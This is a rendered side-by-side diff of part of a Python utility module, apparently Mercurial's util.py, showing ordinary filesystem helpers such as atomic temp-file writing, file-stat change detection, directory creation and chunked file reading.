1695 return r
1687
1696
1688 def fstat(fp):
1697 def fstat(fp):
1689 '''stat file object that may not have fileno method.'''
1698 '''stat file object that may not have fileno method.'''
1690 try:
1699 try:
1691 return os.fstat(fp.fileno())
1700 return os.fstat(fp.fileno())
1692 except AttributeError:
1701 except AttributeError:
1693 return os.stat(fp.name)
1702 return os.stat(fp.name)
1694
1703
1695 # File system features
1704 # File system features
1696
1705
1697 def fscasesensitive(path):
1706 def fscasesensitive(path):
1698 """
1707 """
1699 Return true if the given path is on a case-sensitive filesystem
1708 Return true if the given path is on a case-sensitive filesystem
1700
1709
1701 Requires a path (like /foo/.hg) ending with a foldable final
1710 Requires a path (like /foo/.hg) ending with a foldable final
1702 directory component.
1711 directory component.
1703 """
1712 """
1704 s1 = os.lstat(path)
1713 s1 = os.lstat(path)
1705 d, b = os.path.split(path)
1714 d, b = os.path.split(path)
1706 b2 = b.upper()
1715 b2 = b.upper()
1707 if b == b2:
1716 if b == b2:
1708 b2 = b.lower()
1717 b2 = b.lower()
1709 if b == b2:
1718 if b == b2:
1710 return True # no evidence against case sensitivity
1719 return True # no evidence against case sensitivity
1711 p2 = os.path.join(d, b2)
1720 p2 = os.path.join(d, b2)
1712 try:
1721 try:
1713 s2 = os.lstat(p2)
1722 s2 = os.lstat(p2)
1714 if s2 == s1:
1723 if s2 == s1:
1715 return False
1724 return False
1716 return True
1725 return True
1717 except OSError:
1726 except OSError:
1718 return True
1727 return True
1719
1728
1720 try:
1729 try:
1721 import re2
1730 import re2
1722 _re2 = None
1731 _re2 = None
1723 except ImportError:
1732 except ImportError:
1724 _re2 = False
1733 _re2 = False
1725
1734
1726 class _re(object):
1735 class _re(object):
1727 def _checkre2(self):
1736 def _checkre2(self):
1728 global _re2
1737 global _re2
1729 try:
1738 try:
1730 # check if match works, see issue3964
1739 # check if match works, see issue3964
1731 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1740 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1732 except ImportError:
1741 except ImportError:
1733 _re2 = False
1742 _re2 = False
1734
1743
1735 def compile(self, pat, flags=0):
1744 def compile(self, pat, flags=0):
1736 '''Compile a regular expression, using re2 if possible
1745 '''Compile a regular expression, using re2 if possible
1737
1746
1738 For best performance, use only re2-compatible regexp features. The
1747 For best performance, use only re2-compatible regexp features. The
1739 only flags from the re module that are re2-compatible are
1748 only flags from the re module that are re2-compatible are
1740 IGNORECASE and MULTILINE.'''
1749 IGNORECASE and MULTILINE.'''
1741 if _re2 is None:
1750 if _re2 is None:
1742 self._checkre2()
1751 self._checkre2()
1743 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1752 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1744 if flags & remod.IGNORECASE:
1753 if flags & remod.IGNORECASE:
1745 pat = '(?i)' + pat
1754 pat = '(?i)' + pat
1746 if flags & remod.MULTILINE:
1755 if flags & remod.MULTILINE:
1747 pat = '(?m)' + pat
1756 pat = '(?m)' + pat
1748 try:
1757 try:
1749 return re2.compile(pat)
1758 return re2.compile(pat)
1750 except re2.error:
1759 except re2.error:
1751 pass
1760 pass
1752 return remod.compile(pat, flags)
1761 return remod.compile(pat, flags)
1753
1762
1754 @propertycache
1763 @propertycache
1755 def escape(self):
1764 def escape(self):
1756 '''Return the version of escape corresponding to self.compile.
1765 '''Return the version of escape corresponding to self.compile.
1757
1766
1758 This is imperfect because whether re2 or re is used for a particular
1767 This is imperfect because whether re2 or re is used for a particular
1759 function depends on the flags, etc, but it's the best we can do.
1768 function depends on the flags, etc, but it's the best we can do.
1760 '''
1769 '''
1761 global _re2
1770 global _re2
1762 if _re2 is None:
1771 if _re2 is None:
1763 self._checkre2()
1772 self._checkre2()
1764 if _re2:
1773 if _re2:
1765 return re2.escape
1774 return re2.escape
1766 else:
1775 else:
1767 return remod.escape
1776 return remod.escape
1768
1777
1769 re = _re()
1778 re = _re()
1770
1779
1771 _fspathcache = {}
1780 _fspathcache = {}
1772 def fspath(name, root):
1781 def fspath(name, root):
1773 '''Get name in the case stored in the filesystem
1782 '''Get name in the case stored in the filesystem
1774
1783
1775 The name should be relative to root, and be normcase-ed for efficiency.
1784 The name should be relative to root, and be normcase-ed for efficiency.
1776
1785
1777 Note that this function is unnecessary, and should not be
1786 Note that this function is unnecessary, and should not be
1778 called, for case-sensitive filesystems (simply because it's expensive).
1787 called, for case-sensitive filesystems (simply because it's expensive).
1779
1788
1780 The root should be normcase-ed, too.
1789 The root should be normcase-ed, too.
1781 '''
1790 '''
1782 def _makefspathcacheentry(dir):
1791 def _makefspathcacheentry(dir):
1783 return dict((normcase(n), n) for n in os.listdir(dir))
1792 return dict((normcase(n), n) for n in os.listdir(dir))
1784
1793
1785 seps = pycompat.ossep
1794 seps = pycompat.ossep
1786 if pycompat.osaltsep:
1795 if pycompat.osaltsep:
1787 seps = seps + pycompat.osaltsep
1796 seps = seps + pycompat.osaltsep
1788 # Protect backslashes. This gets silly very quickly.
1797 # Protect backslashes. This gets silly very quickly.
1789 seps.replace('\\','\\\\')
1798 seps.replace('\\','\\\\')
1790 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1799 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1791 dir = os.path.normpath(root)
1800 dir = os.path.normpath(root)
1792 result = []
1801 result = []
1793 for part, sep in pattern.findall(name):
1802 for part, sep in pattern.findall(name):
1794 if sep:
1803 if sep:
1795 result.append(sep)
1804 result.append(sep)
1796 continue
1805 continue
1797
1806
1798 if dir not in _fspathcache:
1807 if dir not in _fspathcache:
1799 _fspathcache[dir] = _makefspathcacheentry(dir)
1808 _fspathcache[dir] = _makefspathcacheentry(dir)
1800 contents = _fspathcache[dir]
1809 contents = _fspathcache[dir]
1801
1810
1802 found = contents.get(part)
1811 found = contents.get(part)
1803 if not found:
1812 if not found:
1804 # retry "once per directory" per "dirstate.walk" which
1813 # retry "once per directory" per "dirstate.walk" which
1805 # may take place for each patches of "hg qpush", for example
1814 # may take place for each patches of "hg qpush", for example
1806 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1815 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1807 found = contents.get(part)
1816 found = contents.get(part)
1808
1817
1809 result.append(found or part)
1818 result.append(found or part)
1810 dir = os.path.join(dir, part)
1819 dir = os.path.join(dir, part)
1811
1820
1812 return ''.join(result)
1821 return ''.join(result)
1813
1822
1814 def checknlink(testfile):
1823 def checknlink(testfile):
1815 '''check whether hardlink count reporting works properly'''
1824 '''check whether hardlink count reporting works properly'''
1816
1825
1817 # testfile may be open, so we need a separate file for checking to
1826 # testfile may be open, so we need a separate file for checking to
1818 # work around issue2543 (or testfile may get lost on Samba shares)
1827 # work around issue2543 (or testfile may get lost on Samba shares)
1819 f1, f2, fp = None, None, None
1828 f1, f2, fp = None, None, None
1820 try:
1829 try:
1821 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1830 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1822 suffix='1~', dir=os.path.dirname(testfile))
1831 suffix='1~', dir=os.path.dirname(testfile))
1823 os.close(fd)
1832 os.close(fd)
1824 f2 = '%s2~' % f1[:-2]
1833 f2 = '%s2~' % f1[:-2]
1825
1834
1826 oslink(f1, f2)
1835 oslink(f1, f2)
1827 # nlinks() may behave differently for files on Windows shares if
1836 # nlinks() may behave differently for files on Windows shares if
1828 # the file is open.
1837 # the file is open.
1829 fp = posixfile(f2)
1838 fp = posixfile(f2)
1830 return nlinks(f2) > 1
1839 return nlinks(f2) > 1
1831 except OSError:
1840 except OSError:
1832 return False
1841 return False
1833 finally:
1842 finally:
1834 if fp is not None:
1843 if fp is not None:
1835 fp.close()
1844 fp.close()
1836 for f in (f1, f2):
1845 for f in (f1, f2):
1837 try:
1846 try:
1838 if f is not None:
1847 if f is not None:
1839 os.unlink(f)
1848 os.unlink(f)
1840 except OSError:
1849 except OSError:
1841 pass
1850 pass
1842
1851
1843 def endswithsep(path):
1852 def endswithsep(path):
1844 '''Check path ends with os.sep or os.altsep.'''
1853 '''Check path ends with os.sep or os.altsep.'''
1845 return (path.endswith(pycompat.ossep)
1854 return (path.endswith(pycompat.ossep)
1846 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1855 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1847
1856
1848 def splitpath(path):
1857 def splitpath(path):
1849 '''Split path by os.sep.
1858 '''Split path by os.sep.
1850 Note that this function does not use os.altsep because this is
1859 Note that this function does not use os.altsep because this is
1851 an alternative of simple "xxx.split(os.sep)".
1860 an alternative of simple "xxx.split(os.sep)".
1852 It is recommended to use os.path.normpath() before using this
1861 It is recommended to use os.path.normpath() before using this
1853 function if need.'''
1862 function if need.'''
1854 return path.split(pycompat.ossep)
1863 return path.split(pycompat.ossep)
1855
1864
1856 def gui():
1865 def gui():
1857 '''Are we running in a GUI?'''
1866 '''Are we running in a GUI?'''
1858 if pycompat.isdarwin:
1867 if pycompat.isdarwin:
1859 if 'SSH_CONNECTION' in encoding.environ:
1868 if 'SSH_CONNECTION' in encoding.environ:
1860 # handle SSH access to a box where the user is logged in
1869 # handle SSH access to a box where the user is logged in
1861 return False
1870 return False
1862 elif getattr(osutil, 'isgui', None):
1871 elif getattr(osutil, 'isgui', None):
1863 # check if a CoreGraphics session is available
1872 # check if a CoreGraphics session is available
1864 return osutil.isgui()
1873 return osutil.isgui()
1865 else:
1874 else:
1866 # pure build; use a safe default
1875 # pure build; use a safe default
1867 return True
1876 return True
1868 else:
1877 else:
1869 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1878 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1870
1879
1871 def mktempcopy(name, emptyok=False, createmode=None):
1880 def mktempcopy(name, emptyok=False, createmode=None):
1872 """Create a temporary file with the same contents from name
1881 """Create a temporary file with the same contents from name
1873
1882
1874 The permission bits are copied from the original file.
1883 The permission bits are copied from the original file.
1875
1884
1876 If the temporary file is going to be truncated immediately, you
1885 If the temporary file is going to be truncated immediately, you
1877 can use emptyok=True as an optimization.
1886 can use emptyok=True as an optimization.
1878
1887
1879 Returns the name of the temporary file.
1888 Returns the name of the temporary file.
1880 """
1889 """
1881 d, fn = os.path.split(name)
1890 d, fn = os.path.split(name)
1882 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1891 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1883 os.close(fd)
1892 os.close(fd)
1884 # Temporary files are created with mode 0600, which is usually not
1893 # Temporary files are created with mode 0600, which is usually not
1885 # what we want. If the original file already exists, just copy
1894 # what we want. If the original file already exists, just copy
1886 # its mode. Otherwise, manually obey umask.
1895 # its mode. Otherwise, manually obey umask.
1887 copymode(name, temp, createmode)
1896 copymode(name, temp, createmode)
1888 if emptyok:
1897 if emptyok:
1889 return temp
1898 return temp
1890 try:
1899 try:
1891 try:
1900 try:
1892 ifp = posixfile(name, "rb")
1901 ifp = posixfile(name, "rb")
1893 except IOError as inst:
1902 except IOError as inst:
1894 if inst.errno == errno.ENOENT:
1903 if inst.errno == errno.ENOENT:
1895 return temp
1904 return temp
1896 if not getattr(inst, 'filename', None):
1905 if not getattr(inst, 'filename', None):
1897 inst.filename = name
1906 inst.filename = name
1898 raise
1907 raise
1899 ofp = posixfile(temp, "wb")
1908 ofp = posixfile(temp, "wb")
1900 for chunk in filechunkiter(ifp):
1909 for chunk in filechunkiter(ifp):
1901 ofp.write(chunk)
1910 ofp.write(chunk)
1902 ifp.close()
1911 ifp.close()
1903 ofp.close()
1912 ofp.close()
1904 except: # re-raises
1913 except: # re-raises
1905 try:
1914 try:
1906 os.unlink(temp)
1915 os.unlink(temp)
1907 except OSError:
1916 except OSError:
1908 pass
1917 pass
1909 raise
1918 raise
1910 return temp
1919 return temp
1911
1920
1912 class filestat(object):
1921 class filestat(object):
1913 """help to exactly detect change of a file
1922 """help to exactly detect change of a file
1914
1923
1915 'stat' attribute is result of 'os.stat()' if specified 'path'
1924 'stat' attribute is result of 'os.stat()' if specified 'path'
1916 exists. Otherwise, it is None. This can avoid preparative
1925 exists. Otherwise, it is None. This can avoid preparative
1917 'exists()' examination on client side of this class.
1926 'exists()' examination on client side of this class.
1918 """
1927 """
1919 def __init__(self, stat):
1928 def __init__(self, stat):
1920 self.stat = stat
1929 self.stat = stat
1921
1930
1922 @classmethod
1931 @classmethod
1923 def frompath(cls, path):
1932 def frompath(cls, path):
1924 try:
1933 try:
1925 stat = os.stat(path)
1934 stat = os.stat(path)
1926 except OSError as err:
1935 except OSError as err:
1927 if err.errno != errno.ENOENT:
1936 if err.errno != errno.ENOENT:
1928 raise
1937 raise
1929 stat = None
1938 stat = None
1930 return cls(stat)
1939 return cls(stat)
1931
1940
1932 @classmethod
1941 @classmethod
1933 def fromfp(cls, fp):
1942 def fromfp(cls, fp):
1934 stat = os.fstat(fp.fileno())
1943 stat = os.fstat(fp.fileno())
1935 return cls(stat)
1944 return cls(stat)
1936
1945
1937 __hash__ = object.__hash__
1946 __hash__ = object.__hash__
1938
1947
1939 def __eq__(self, old):
1948 def __eq__(self, old):
1940 try:
1949 try:
1941 # if ambiguity between stat of new and old file is
1950 # if ambiguity between stat of new and old file is
1942 # avoided, comparison of size, ctime and mtime is enough
1951 # avoided, comparison of size, ctime and mtime is enough
1943 # to exactly detect change of a file regardless of platform
1952 # to exactly detect change of a file regardless of platform
1944 return (self.stat.st_size == old.stat.st_size and
1953 return (self.stat.st_size == old.stat.st_size and
1945 self.stat.st_ctime == old.stat.st_ctime and
1954 self.stat.st_ctime == old.stat.st_ctime and
1946 self.stat.st_mtime == old.stat.st_mtime)
1955 self.stat.st_mtime == old.stat.st_mtime)
1947 except AttributeError:
1956 except AttributeError:
1948 pass
1957 pass
1949 try:
1958 try:
1950 return self.stat is None and old.stat is None
1959 return self.stat is None and old.stat is None
1951 except AttributeError:
1960 except AttributeError:
1952 return False
1961 return False
1953
1962
1954 def isambig(self, old):
1963 def isambig(self, old):
1955 """Examine whether new (= self) stat is ambiguous against old one
1964 """Examine whether new (= self) stat is ambiguous against old one
1956
1965
1957 "S[N]" below means stat of a file at N-th change:
1966 "S[N]" below means stat of a file at N-th change:
1958
1967
1959 - S[n-1].ctime < S[n].ctime: can detect change of a file
1968 - S[n-1].ctime < S[n].ctime: can detect change of a file
1960 - S[n-1].ctime == S[n].ctime
1969 - S[n-1].ctime == S[n].ctime
1961 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1970 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1962 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1971 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1963 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1972 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1964 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1973 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1965
1974
1966 Case (*2) above means that a file was changed twice or more at
1975 Case (*2) above means that a file was changed twice or more at
1967 same time in sec (= S[n-1].ctime), and comparison of timestamp
1976 same time in sec (= S[n-1].ctime), and comparison of timestamp
1968 is ambiguous.
1977 is ambiguous.
1969
1978
1970 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1979 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1971 timestamp is ambiguous".
1980 timestamp is ambiguous".
1972
1981
1973 But advancing mtime only in case (*2) doesn't work as
1982 But advancing mtime only in case (*2) doesn't work as
1974 expected, because naturally advanced S[n].mtime in case (*1)
1983 expected, because naturally advanced S[n].mtime in case (*1)
1975 might be equal to manually advanced S[n-1 or earlier].mtime.
1984 might be equal to manually advanced S[n-1 or earlier].mtime.
1976
1985
1977 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1986 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1978 treated as ambiguous regardless of mtime, to avoid overlooking
1987 treated as ambiguous regardless of mtime, to avoid overlooking
1979 by confliction between such mtime.
1988 by confliction between such mtime.
1980
1989
1981 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1990 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1982 S[n].mtime", even if size of a file isn't changed.
1991 S[n].mtime", even if size of a file isn't changed.
1983 """
1992 """
1984 try:
1993 try:
1985 return (self.stat.st_ctime == old.stat.st_ctime)
1994 return (self.stat.st_ctime == old.stat.st_ctime)
1986 except AttributeError:
1995 except AttributeError:
1987 return False
1996 return False
1988
1997
1989 def avoidambig(self, path, old):
1998 def avoidambig(self, path, old):
1990 """Change file stat of specified path to avoid ambiguity
1999 """Change file stat of specified path to avoid ambiguity
1991
2000
1992 'old' should be previous filestat of 'path'.
2001 'old' should be previous filestat of 'path'.
1993
2002
1994 This skips avoiding ambiguity, if a process doesn't have
2003 This skips avoiding ambiguity, if a process doesn't have
1995 appropriate privileges for 'path'. This returns False in this
2004 appropriate privileges for 'path'. This returns False in this
1996 case.
2005 case.
1997
2006
1998 Otherwise, this returns True, as "ambiguity is avoided".
2007 Otherwise, this returns True, as "ambiguity is avoided".
1999 """
2008 """
2000 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2009 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2001 try:
2010 try:
2002 os.utime(path, (advanced, advanced))
2011 os.utime(path, (advanced, advanced))
2003 except OSError as inst:
2012 except OSError as inst:
2004 if inst.errno == errno.EPERM:
2013 if inst.errno == errno.EPERM:
2005 # utime() on the file created by another user causes EPERM,
2014 # utime() on the file created by another user causes EPERM,
2006 # if a process doesn't have appropriate privileges
2015 # if a process doesn't have appropriate privileges
2007 return False
2016 return False
2008 raise
2017 raise
2009 return True
2018 return True
2010
2019
2011 def __ne__(self, other):
2020 def __ne__(self, other):
2012 return not self == other
2021 return not self == other
2013
2022
2014 class atomictempfile(object):
2023 class atomictempfile(object):
2015 '''writable file object that atomically updates a file
2024 '''writable file object that atomically updates a file
2016
2025
2017 All writes will go to a temporary copy of the original file. Call
2026 All writes will go to a temporary copy of the original file. Call
2018 close() when you are done writing, and atomictempfile will rename
2027 close() when you are done writing, and atomictempfile will rename
2019 the temporary copy to the original name, making the changes
2028 the temporary copy to the original name, making the changes
2020 visible. If the object is destroyed without being closed, all your
2029 visible. If the object is destroyed without being closed, all your
2021 writes are discarded.
2030 writes are discarded.
2022
2031
2023 checkambig argument of constructor is used with filestat, and is
2032 checkambig argument of constructor is used with filestat, and is
2024 useful only if target file is guarded by any lock (e.g. repo.lock
2033 useful only if target file is guarded by any lock (e.g. repo.lock
2025 or repo.wlock).
2034 or repo.wlock).
2026 '''
2035 '''
2027 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2036 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2028 self.__name = name # permanent name
2037 self.__name = name # permanent name
2029 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2038 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2030 createmode=createmode)
2039 createmode=createmode)
2031 self._fp = posixfile(self._tempname, mode)
2040 self._fp = posixfile(self._tempname, mode)
2032 self._checkambig = checkambig
2041 self._checkambig = checkambig
2033
2042
2034 # delegated methods
2043 # delegated methods
2035 self.read = self._fp.read
2044 self.read = self._fp.read
2036 self.write = self._fp.write
2045 self.write = self._fp.write
2037 self.seek = self._fp.seek
2046 self.seek = self._fp.seek
2038 self.tell = self._fp.tell
2047 self.tell = self._fp.tell
2039 self.fileno = self._fp.fileno
2048 self.fileno = self._fp.fileno
2040
2049
2041 def close(self):
2050 def close(self):
2042 if not self._fp.closed:
2051 if not self._fp.closed:
2043 self._fp.close()
2052 self._fp.close()
2044 filename = localpath(self.__name)
2053 filename = localpath(self.__name)
2045 oldstat = self._checkambig and filestat.frompath(filename)
2054 oldstat = self._checkambig and filestat.frompath(filename)
2046 if oldstat and oldstat.stat:
2055 if oldstat and oldstat.stat:
2047 rename(self._tempname, filename)
2056 rename(self._tempname, filename)
2048 newstat = filestat.frompath(filename)
2057 newstat = filestat.frompath(filename)
2049 if newstat.isambig(oldstat):
2058 if newstat.isambig(oldstat):
2050 # stat of changed file is ambiguous to original one
2059 # stat of changed file is ambiguous to original one
2051 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2060 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2052 os.utime(filename, (advanced, advanced))
2061 os.utime(filename, (advanced, advanced))
2053 else:
2062 else:
2054 rename(self._tempname, filename)
2063 rename(self._tempname, filename)
2055
2064
2056 def discard(self):
2065 def discard(self):
2057 if not self._fp.closed:
2066 if not self._fp.closed:
2058 try:
2067 try:
2059 os.unlink(self._tempname)
2068 os.unlink(self._tempname)
2060 except OSError:
2069 except OSError:
2061 pass
2070 pass
2062 self._fp.close()
2071 self._fp.close()
2063
2072
2064 def __del__(self):
2073 def __del__(self):
2065 if safehasattr(self, '_fp'): # constructor actually did something
2074 if safehasattr(self, '_fp'): # constructor actually did something
2066 self.discard()
2075 self.discard()
2067
2076
2068 def __enter__(self):
2077 def __enter__(self):
2069 return self
2078 return self
2070
2079
2071 def __exit__(self, exctype, excvalue, traceback):
2080 def __exit__(self, exctype, excvalue, traceback):
2072 if exctype is not None:
2081 if exctype is not None:
2073 self.discard()
2082 self.discard()
2074 else:
2083 else:
2075 self.close()
2084 self.close()
2076
2085
2077 def unlinkpath(f, ignoremissing=False):
2086 def unlinkpath(f, ignoremissing=False):
2078 """unlink and remove the directory if it is empty"""
2087 """unlink and remove the directory if it is empty"""
2079 if ignoremissing:
2088 if ignoremissing:
2080 tryunlink(f)
2089 tryunlink(f)
2081 else:
2090 else:
2082 unlink(f)
2091 unlink(f)
2083 # try removing directories that might now be empty
2092 # try removing directories that might now be empty
2084 try:
2093 try:
2085 removedirs(os.path.dirname(f))
2094 removedirs(os.path.dirname(f))
2086 except OSError:
2095 except OSError:
2087 pass
2096 pass
2088
2097
2089 def tryunlink(f):
2098 def tryunlink(f):
2090 """Attempt to remove a file, ignoring ENOENT errors."""
2099 """Attempt to remove a file, ignoring ENOENT errors."""
2091 try:
2100 try:
2092 unlink(f)
2101 unlink(f)
2093 except OSError as e:
2102 except OSError as e:
2094 if e.errno != errno.ENOENT:
2103 if e.errno != errno.ENOENT:
2095 raise
2104 raise
2096
2105
2097 def makedirs(name, mode=None, notindexed=False):
2106 def makedirs(name, mode=None, notindexed=False):
2098 """recursive directory creation with parent mode inheritance
2107 """recursive directory creation with parent mode inheritance
2099
2108
2100 Newly created directories are marked as "not to be indexed by
2109 Newly created directories are marked as "not to be indexed by
2101 the content indexing service", if ``notindexed`` is specified
2110 the content indexing service", if ``notindexed`` is specified
2102 for "write" mode access.
2111 for "write" mode access.
2103 """
2112 """
2104 try:
2113 try:
2105 makedir(name, notindexed)
2114 makedir(name, notindexed)
2106 except OSError as err:
2115 except OSError as err:
2107 if err.errno == errno.EEXIST:
2116 if err.errno == errno.EEXIST:
2108 return
2117 return
2109 if err.errno != errno.ENOENT or not name:
2118 if err.errno != errno.ENOENT or not name:
2110 raise
2119 raise
2111 parent = os.path.dirname(os.path.abspath(name))
2120 parent = os.path.dirname(os.path.abspath(name))
2112 if parent == name:
2121 if parent == name:
2113 raise
2122 raise
2114 makedirs(parent, mode, notindexed)
2123 makedirs(parent, mode, notindexed)
2115 try:
2124 try:
2116 makedir(name, notindexed)
2125 makedir(name, notindexed)
2117 except OSError as err:
2126 except OSError as err:
2118 # Catch EEXIST to handle races
2127 # Catch EEXIST to handle races
2119 if err.errno == errno.EEXIST:
2128 if err.errno == errno.EEXIST:
2120 return
2129 return
2121 raise
2130 raise
2122 if mode is not None:
2131 if mode is not None:
2123 os.chmod(name, mode)
2132 os.chmod(name, mode)
2124
2133
2125 def readfile(path):
2134 def readfile(path):
2126 with open(path, 'rb') as fp:
2135 with open(path, 'rb') as fp:
2127 return fp.read()
2136 return fp.read()
2128
2137
2129 def writefile(path, text):
2138 def writefile(path, text):
2130 with open(path, 'wb') as fp:
2139 with open(path, 'wb') as fp:
2131 fp.write(text)
2140 fp.write(text)
2132
2141
2133 def appendfile(path, text):
2142 def appendfile(path, text):
2134 with open(path, 'ab') as fp:
2143 with open(path, 'ab') as fp:
2135 fp.write(text)
2144 fp.write(text)
2136
2145
2137 class chunkbuffer(object):
2146 class chunkbuffer(object):
2138 """Allow arbitrary sized chunks of data to be efficiently read from an
2147 """Allow arbitrary sized chunks of data to be efficiently read from an
2139 iterator over chunks of arbitrary size."""
2148 iterator over chunks of arbitrary size."""
2140
2149
2141 def __init__(self, in_iter):
2150 def __init__(self, in_iter):
2142 """in_iter is the iterator that's iterating over the input chunks."""
2151 """in_iter is the iterator that's iterating over the input chunks."""
2143 def splitbig(chunks):
2152 def splitbig(chunks):
2144 for chunk in chunks:
2153 for chunk in chunks:
2145 if len(chunk) > 2**20:
2154 if len(chunk) > 2**20:
2146 pos = 0
2155 pos = 0
2147 while pos < len(chunk):
2156 while pos < len(chunk):
2148 end = pos + 2 ** 18
2157 end = pos + 2 ** 18
2149 yield chunk[pos:end]
2158 yield chunk[pos:end]
2150 pos = end
2159 pos = end
2151 else:
2160 else:
2152 yield chunk
2161 yield chunk
2153 self.iter = splitbig(in_iter)
2162 self.iter = splitbig(in_iter)
2154 self._queue = collections.deque()
2163 self._queue = collections.deque()
2155 self._chunkoffset = 0
2164 self._chunkoffset = 0
2156
2165
2157 def read(self, l=None):
2166 def read(self, l=None):
2158 """Read L bytes of data from the iterator of chunks of data.
2167 """Read L bytes of data from the iterator of chunks of data.
2159 Returns less than L bytes if the iterator runs dry.
2168 Returns less than L bytes if the iterator runs dry.
2160
2169
2161 If size parameter is omitted, read everything"""
2170 If size parameter is omitted, read everything"""
2162 if l is None:
2171 if l is None:
2163 return ''.join(self.iter)
2172 return ''.join(self.iter)
2164
2173
2165 left = l
2174 left = l
2166 buf = []
2175 buf = []
2167 queue = self._queue
2176 queue = self._queue
2168 while left > 0:
2177 while left > 0:
2169 # refill the queue
2178 # refill the queue
2170 if not queue:
2179 if not queue:
2171 target = 2**18
2180 target = 2**18
2172 for chunk in self.iter:
2181 for chunk in self.iter:
2173 queue.append(chunk)
2182 queue.append(chunk)
2174 target -= len(chunk)
2183 target -= len(chunk)
2175 if target <= 0:
2184 if target <= 0:
2176 break
2185 break
2177 if not queue:
2186 if not queue:
2178 break
2187 break
2179
2188
2180 # The easy way to do this would be to queue.popleft(), modify the
2189 # The easy way to do this would be to queue.popleft(), modify the
2181 # chunk (if necessary), then queue.appendleft(). However, for cases
2190 # chunk (if necessary), then queue.appendleft(). However, for cases
2182 # where we read partial chunk content, this incurs 2 dequeue
2191 # where we read partial chunk content, this incurs 2 dequeue
2183 # mutations and creates a new str for the remaining chunk in the
2192 # mutations and creates a new str for the remaining chunk in the
2184 # queue. Our code below avoids this overhead.
2193 # queue. Our code below avoids this overhead.
2185
2194
2186 chunk = queue[0]
2195 chunk = queue[0]
2187 chunkl = len(chunk)
2196 chunkl = len(chunk)
2188 offset = self._chunkoffset
2197 offset = self._chunkoffset
2189
2198
2190 # Use full chunk.
2199 # Use full chunk.
2191 if offset == 0 and left >= chunkl:
2200 if offset == 0 and left >= chunkl:
2192 left -= chunkl
2201 left -= chunkl
2193 queue.popleft()
2202 queue.popleft()
2194 buf.append(chunk)
2203 buf.append(chunk)
2195 # self._chunkoffset remains at 0.
2204 # self._chunkoffset remains at 0.
2196 continue
2205 continue
2197
2206
2198 chunkremaining = chunkl - offset
2207 chunkremaining = chunkl - offset
2199
2208
2200 # Use all of unconsumed part of chunk.
2209 # Use all of unconsumed part of chunk.
2201 if left >= chunkremaining:
2210 if left >= chunkremaining:
2202 left -= chunkremaining
2211 left -= chunkremaining
2203 queue.popleft()
2212 queue.popleft()
2204 # offset == 0 is enabled by block above, so this won't merely
2213 # offset == 0 is enabled by block above, so this won't merely
2205 # copy via ``chunk[0:]``.
2214 # copy via ``chunk[0:]``.
2206 buf.append(chunk[offset:])
2215 buf.append(chunk[offset:])
2207 self._chunkoffset = 0
2216 self._chunkoffset = 0
2208
2217
2209 # Partial chunk needed.
2218 # Partial chunk needed.
2210 else:
2219 else:
2211 buf.append(chunk[offset:offset + left])
2220 buf.append(chunk[offset:offset + left])
2212 self._chunkoffset += left
2221 self._chunkoffset += left
2213 left -= chunkremaining
2222 left -= chunkremaining
2214
2223
2215 return ''.join(buf)
2224 return ''.join(buf)
2216
2225
2217 def filechunkiter(f, size=131072, limit=None):
2226 def filechunkiter(f, size=131072, limit=None):
2218 """Create a generator that produces the data in the file size
2227 """Create a generator that produces the data in the file size
2219 (default 131072) bytes at a time, up to optional limit (default is
2228 (default 131072) bytes at a time, up to optional limit (default is
2220 to read all data). Chunks may be less than size bytes if the
2229 to read all data). Chunks may be less than size bytes if the
2221 chunk is the last chunk in the file, or the file is a socket or
2230 chunk is the last chunk in the file, or the file is a socket or
2222 some other type of file that sometimes reads less data than is
2231 some other type of file that sometimes reads less data than is
2223 requested."""
2232 requested."""
2224 assert size >= 0
2233 assert size >= 0
2225 assert limit is None or limit >= 0
2234 assert limit is None or limit >= 0
2226 while True:
2235 while True:
2227 if limit is None:
2236 if limit is None:
2228 nbytes = size
2237 nbytes = size
2229 else:
2238 else:
2230 nbytes = min(limit, size)
2239 nbytes = min(limit, size)
2231 s = nbytes and f.read(nbytes)
2240 s = nbytes and f.read(nbytes)
2232 if not s:
2241 if not s:
2233 break
2242 break
2234 if limit:
2243 if limit:
2235 limit -= len(s)
2244 limit -= len(s)
2236 yield s
2245 yield s
2237
2246
